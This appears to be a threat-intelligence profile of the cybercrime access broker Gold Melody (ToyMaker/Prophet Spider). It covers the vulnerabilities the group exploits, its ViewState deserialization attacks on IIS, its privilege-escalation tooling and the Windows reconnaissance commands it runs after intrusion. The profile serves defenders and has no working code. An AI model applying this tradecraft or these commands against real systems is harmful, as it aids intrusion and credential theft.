ToyMaker

Gold Melody is a financially motivated cybercrime initial access broker (IAB) active since at least 2017. Known aliases include UNC961, Prophet Spider, ToyMaker, and TGR-CRI-0045; Unit 42 attributed TGR-CRI-0045 to Gold Melody with medium confidence. The group opportunistically scans and exploits internet-facing servers and public-facing applications to compromise networks and then hand off or sell that access to other actors, including ransomware operators. Reporting cited in the content links the actor to access brokerage associated with CACTUS, and earlier reporting assessed Prophet Spider likely provided access to Egregor and MountLocker operators. The actor has been observed exploiting Oracle WebLogic Server vulnerabilities, including CVE-2020-14882, CVE-2020-14750, and older issues such as CVE-2016-0545, as well as SQL injection, to gain initial access. BlackBerry also correlated Prophet Spider activity with exploitation of Log4Shell vulnerabilities in VMware Horizon. More recently, Unit 42 reported a campaign targeting Microsoft IIS servers by abusing exposed ASP.NET Machine Keys to sign malicious __VIEWSTATE payloads and achieve View State deserialization-based remote code execution. In that activity, the actor executed malicious .NET assemblies in memory, reducing on-disk artifacts. Observed post-exploitation tradecraft includes command execution from w3wp.exe, use of a consistent staging directory such as C:\Windows\Temp\111t, retrieval of tooling via curl, reflective in-memory loading of .NET modules, and use of a custom privilege-escalation tool named updf leveraging GodPotato to obtain SYSTEM and create local administrator accounts. The actor has also used TxPortMap for internal network discovery and performed reconnaissance with commands such as tasklist, ipconfig /all, quser, whoami /all, nltest /domain_trusts, net user, and systeminfo. In VMware Horizon/Log4Shell-related activity associated with Prophet Spider, reporting noted ws_TomcatService.exe spawning cmd.exe or powershell.exe, encoded PowerShell download cradles, use of C:\Windows\Temp\7fde, download of wget.bin and additional payloads, registry hive dumping for credential harvesting, webshell injection into absg-worker.js, and in some cases deployment of cryptocurrency miners or Cobalt Strike. Victims mentioned in the content include organizations in Europe and the United States across financial services, manufacturing, wholesale/retail, high technology, and transportation/logistics. The content also states that Gold Melody favors opportunistic compromise of vulnerable internet-facing infrastructure and then monetizes access through downstream criminal partners.